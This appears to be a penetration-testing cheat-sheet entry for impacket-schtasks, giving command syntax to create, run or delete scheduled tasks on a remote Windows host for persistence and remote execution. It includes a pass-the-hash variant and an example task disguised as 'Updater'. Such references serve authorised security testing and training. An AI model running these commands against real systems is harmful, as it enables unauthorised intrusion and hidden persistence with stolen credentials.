Impacket Scheduled Tasks

Create, delete, or run scheduled tasks on a remote host via ATSVC

Tool
impacket-schtasks
Category
Post-Exploitation / Persistence
Platform
linux
Requires
password
Protocols
SMB, RPC

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-schtasks '<domain>/<user>:<password>'@'<ip>' -action create -taskname '<task>' -command '<cmd>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-schtasks -hashes ':<hash>' '<domain>/<user>'@'<ip>' -action create -taskname '<task>' -command '<cmd>'

Delete Task requires password

impacket-schtasks '<domain>/<user>:<password>'@'<ip>' -action delete -taskname '<task>'

Examples

impacket-schtasks 'CORP.LOCAL/user:password'@192.168.1.100 -action create -taskname 'Updater' -command 'cmd.exe /c whoami > C:\\out.txt'

Tags

impacket schtasks scheduled-task persistence remote-execution